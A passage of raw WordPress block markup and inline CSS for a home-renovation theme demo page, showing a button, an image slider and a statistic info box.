WORKS\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\",\"counterId\":\"523235bc-2db6-4b36-807b-ccf57ff2b66a\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-523235bc-2db6-4b36-807b-ccf57ff2b66a skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3\"} -->\n<style type=\"text/css\"> .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f48f46fe-9420-4cd1-a1cd-d7c2b41d4ee3\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"0ee250e6-d2c0-4a54-855c-c9a5ea24a891\"} -->\n<style type=\"text/css\"> .block-id-0ee250e6-d2c0-4a54-855c-c9a5ea24a891 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-0ee250e6-d2c0-4a54-855c-c9a5ea24a891 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-0ee250e6-d2c0-4a54-855c-c9a5ea24a891 .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-0ee250e6-d2c0-4a54-855c-c9a5ea24a891 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"26c58722-09e8-4e24-8b58-31e2262a34b4\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-26c58722-09e8-4e24-8b58-31e2262a34b4 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-26c58722-09e8-4e24-8b58-31e2262a34b4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-26c58722-09e8-4e24-8b58-31e2262a34b4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-26c58722-09e8-4e24-8b58-31e2262a34b4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-26c58722-09e8-4e24-8b58-31e2262a34b4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"1fd0b7b2-91d8-46d5-8f09-59f88b116616\"} -->\n<style type=\"text/css\"> .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1fd0b7b2-91d8-46d5-8f09-59f88b116616 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"d5edc62b-d1c5-45f7-bab5-16740b0f6d87\"} -->\n<style type=\"text/css\"> .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d5edc62b-d1c5-45f7-bab5-16740b0f6d87\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"8de3594a-c7f7-4e6b-bb64-582b8fe3d309\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-8de3594a-c7f7-4e6b-bb64-582b8fe3d309 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"4f102aee-ad93-49eb-af11-54a2955ce371\"} -->\n<style type=\"text/css\"> .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4f102aee-ad93-49eb-af11-54a2955ce371 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-4f102aee-ad93-49eb-af11-54a2955ce371\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 